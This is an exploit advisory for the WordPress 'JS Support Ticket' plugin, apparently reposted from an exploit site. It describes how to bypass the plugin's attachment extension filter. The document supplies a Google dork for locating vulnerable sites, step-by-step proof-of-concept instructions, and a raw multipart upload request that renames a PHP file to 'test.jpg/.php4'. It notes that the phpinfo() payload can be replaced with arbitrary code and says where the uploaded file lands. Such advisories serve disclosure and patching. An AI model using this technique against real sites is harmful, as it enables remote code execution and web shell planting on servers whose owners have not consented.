# Exploit Title: [
Wordpress "Js Support Ticket" File Upload Bypass Extensions]
# Google Dork: [inurl:/js-support-ticket-controlpanel/]
# Date: [3-12-2015]
# Exploit Author: [Mgm-Eg]
# Vendor Homepage: [http://joomsky.com/products/js-supprot-ticket-wp.html]
# Version: [1.X.X]
# Contact: [https://ask.fm/m1g1m]
---------------
1- Description |
---------------
When you open ticket you can upload Attachments only File Extension Type (doc,docx,odt,pdf,txt,png,jpeg,jpg)
but you can bypass it and upload another extensions .
--------------------------------------
2- |Proof of Concept|
--------------------------------------
Use Notepad++ open new file ,
Add
[ GIF89a;
<?php phpinfo(); ?> #you can replace this code to your code
]
" save file as test.jpg "
Open ticket page and Complete the required fields , and upload your [test.jpg]
Use Http Live Header , Open the request and edit file name from "test.jpg" to "test.jpg/.php4" and delete "GIF89a;"
example :
-----------------------------319722301512393\r\n
Content-Disposition: form-data; name="filename[]"; filename="test.jpg/.php4"\r\n
Content-Type: image/jpeg\r\n
\r\n
\r\n
<?php phpinfo(); ?>\r\n
-----------------------------319722301512393\r\n
#File will be visible:
http://wordpress_site/wp-content/plugins/js-support-ticket/jssupporttick...
#also check your email to know your path file , or open my tickets to see all tickets you have sent to know your path file .
# 0day.today [2015-12-09] #